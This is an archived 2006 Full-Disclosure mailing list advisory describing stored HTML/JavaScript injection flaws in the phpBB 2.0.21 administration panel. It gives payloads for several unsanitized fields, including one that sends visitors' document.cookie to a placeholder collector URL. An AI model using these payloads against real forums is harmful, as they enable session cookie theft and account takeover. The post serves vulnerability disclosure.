lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat Jul 15 15:59:24 2006
From: renatrix at gmail.com (Renatrix Renatrix)
Subject: phpBB Multiple HTML Injection Vulnerabilities

phpBB 2.0.21 XSS in administration
**********************************

//-- By Blwood [renatrix@...il.com]
//-- [ http://www.blwood.net ]
//--

Style Admin
-----------

Management & Create a theme

Lots of input are not properly sanitized like style_name, head_stylesheet,
body_background, tr_color1_name (all the input in simple name)...

We cand ofcourse inject html in this way : "><h1>Owned by Blwood :P</h1>
but it's more interresting to inject javascript :) :
"><body onload="alert('Owned by Blwood')"> => style_name
"><script>alert('Owned by Blwood')</script> => head_stylesheet,
body_background, ...
When an admin will go in Style Administration he will be Owned. (inject in
style_name)
When an admin will edit a them he will be Owned.


Group Administration
--------------------

Management

Input group_description is not correctly sanitized we can inject js like
this : "><script>alert('Owned by Blwood')</script> or
</textare>"><script>alert('Owned by Blwood')</script>
When an admin will go in Group administration he'll be owned. But what's
more, the groups can be seen in groupcp.php
by every visitors.
An exploit could be :
</textarea>"><script>
document.location='http://127.0.0.1/cookie.php?'+document.cookie</script>
or
</textarea>"><script>document.location='http://site.com/ownedpage.html'
</script>

Ranks
-----

Rank Administration

Rank Title (input title) is not correctly sanitized, we can inject js like :
"><script>alert('xss')</script>
But what's interresting, if you give this rank to an user, the rank will
appear in user's topics and the code will be executed when someone sees a
topic :)
Now you can inject what you want but maximum 40 caracters...



Smilies
-------

Smiles Editing Utility

Smiley Code : "><body onload="alert('Owned by Blwood')">

Configuration
-------------

General Configuartion

Inputs are not correctly sanitized : Ex : allow_html_tags  =>
"><script>alert('Owned by Blwood')</script>



[ Video ]

http://www.blwood.net/advisory/phpbb2021xssadmin.rar
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060715/8520c701/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ